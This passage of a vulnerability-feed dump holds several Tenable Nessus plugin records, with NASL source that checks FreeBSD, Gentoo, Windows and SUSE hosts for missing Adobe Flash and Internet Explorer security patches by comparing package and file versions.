PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84628);\n script_version(\"2.10\");\n script_cvs_date(\"Date: 2018/11/10 11:49:44\");\n\n script_cve_id(\"CVE-2015-5119\");\n\n script_name(english:\"FreeBSD : Adobe Flash Player -- critical vulnerabilities (348bfa69-25a2-11e5-ade1-0011d823eebd) (Underminer)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player. These\nupdates address critical vulnerabilities that could potentially allow\nan attacker to take control of the affected system. Adobe is aware of\na report that an exploit targeting CVE-2015-5119 has been publicly\npublished.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\"\n );\n # https://vuxml.freebsd.org/freebsd/348bfa69-25a2-11e5-ade1-0011d823eebd.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?639ba9ec\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.481\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.481\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:20:53", "bulletinFamily": "scanner", "description": "The remote host is missing Internet Explorer (IE) Security Update 2925418.\n\nThe installed version of IE is affected by multiple privilege escalation and memory corruption vulnerabilities that could allow an attacker to execute arbitrary code on the remote host. Additionally, the installed version of IE is affected by an information disclosure vulnerability.", "modified": "2018-11-15T00:00:00", "id": "SMB_NT_MS14-012.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=72930", "published": "2014-03-11T00:00:00", "title": "MS14-012: Cumulative Security Update for Internet Explorer (2925418)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72930);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\n \"CVE-2014-0297\",\n \"CVE-2014-0298\",\n \"CVE-2014-0299\",\n \"CVE-2014-0302\",\n \"CVE-2014-0303\",\n \"CVE-2014-0304\",\n \"CVE-2014-0305\",\n \"CVE-2014-0306\",\n \"CVE-2014-0307\",\n \"CVE-2014-0308\",\n \"CVE-2014-0309\",\n \"CVE-2014-0311\",\n \"CVE-2014-0312\",\n \"CVE-2014-0313\",\n \"CVE-2014-0314\",\n \"CVE-2014-0321\",\n \"CVE-2014-0322\",\n \"CVE-2014-0324\",\n \"CVE-2014-4112\"\n );\n script_bugtraq_id(\n 65551,\n 66023,\n 66025,\n 66026,\n 66027,\n 66028,\n 66029,\n 66030,\n 66031,\n 66032,\n 66033,\n 66034,\n 66035,\n 66036,\n 66037,\n 66038,\n 66039,\n 66040,\n 70266\n );\n script_xref(name:\"CERT\", value:\"732479\");\n script_xref(name:\"EDB-ID\", value:\"32851\");\n script_xref(name:\"EDB-ID\", value:\"32438\");\n script_xref(name:\"EDB-ID\", value:\"32904\");\n script_xref(name:\"MSFT\", value:\"MS14-012\");\n script_xref(name:\"MSKB\", value:\"2925418\");\n\n script_name(english:\"MS14-012: Cumulative Security Update for Internet Explorer (2925418)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web browser that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2925418.\n\nThe installed version of IE is affected by multiple privilege\nescalation and memory corruption vulnerabilities that could allow an\nattacker to execute arbitrary code on the remote host. Additionally,\nthe installed version of IE is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-030/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-031/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-032/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-033/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-034/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-035/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-036/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-012\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2, 8, 2012, 8.1, and 2012 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS14-012';\nkb = '2925418';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / 2012 R2\n #\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", file:\"Mshtml.dll\", version:\"11.0.9600.16521\", min_version:\"11.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # Windows 8 / 2012\n #\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.20963\", min_version:\"10.0.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.16843\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 7 / 2008 R2\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"11.0.9600.16521\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.20963\", min_version:\"10.0.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.16843\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.20651\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.16540\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22597\", min_version:\"8.0.7601.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18392\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.20651\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.16540\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23569\", min_version:\"8.0.6001.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19507\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.23330\", min_version:\"7.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.19041\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23569\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21371\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5294\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23569\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21371\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6512\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:25:06", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201507-13 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-07-30T00:00:00", "id": "GENTOO_GLSA-201507-13.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=86083", "published": "2015-09-23T00:00:00", "title": "GLSA-201507-13 : Adobe Flash Player: Multiple vulnerabilities (Underminer)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201507-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86083);\n script_version(\"2.3\");\n script_cvs_date(\"Date: 2018/07/30 11:55:11\");\n\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3113\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_xref(name:\"GLSA\", value:\"201507-13\");\n\n script_name(english:\"GLSA-201507-13 : Adobe Flash Player: Multiple vulnerabilities (Underminer)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201507-13\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201507-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-11.2.202.481'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.481\"), vulnerable:make_list(\"lt 11.2.202.481\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:24:32", "bulletinFamily": "scanner", "description": "flash-player was updated to fix 35 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: NULL pointer dereference issues (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that could lead to information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433: Type confusion vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119: Use-after-free vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116: Vulnerabilities that could be exploited to bypass the same-origin-policy and lead to information disclosure (bsc#937339).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-29T00:00:00", "id": "SUSE_SU-2015-1211-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84662", "published": "2015-07-13T00:00:00", "title": "SUSE SLED12 Security Update : flash-player (SUSE-SU-2015:1211-1) (Underminer)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1211-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84662);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/29 12:03:38\");\n\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_bugtraq_id(75568, 75590, 75591, 75592, 75593, 75594, 75595, 75596);\n\n script_name(english:\"SUSE SLED12 Security Update : flash-player (SUSE-SU-2015:1211-1) (Underminer)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"flash-player was updated to fix 35 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer\n overflow vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130,\n CVE-2015-3133, CVE-2015-3134, CVE-2015-4431: Memory\n corruption vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: NULL pointer dereference\n issues (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that\n could lead to information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121,\n CVE-2015-3122, CVE-2015-4433: Type confusion\n vulnerabilities that could lead to code execution\n (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117,\n CVE-2015-3127, CVE-2015-3128, CVE-2015-3129,\n CVE-2015-3131, CVE-2015-3132, CVE-2015-3136,\n CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could\n lead to code execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116,\n CVE-2015-3125, CVE-2015-5116: Vulnerabilities that could\n be exploited to bypass the same-origin-policy and lead\n to information disclosure (bsc#937339).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-0578/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3114/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3115/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3116/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3117/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3118/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3119/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3120/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3121/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3122/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3123/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3124/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3125/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3126/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3128/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 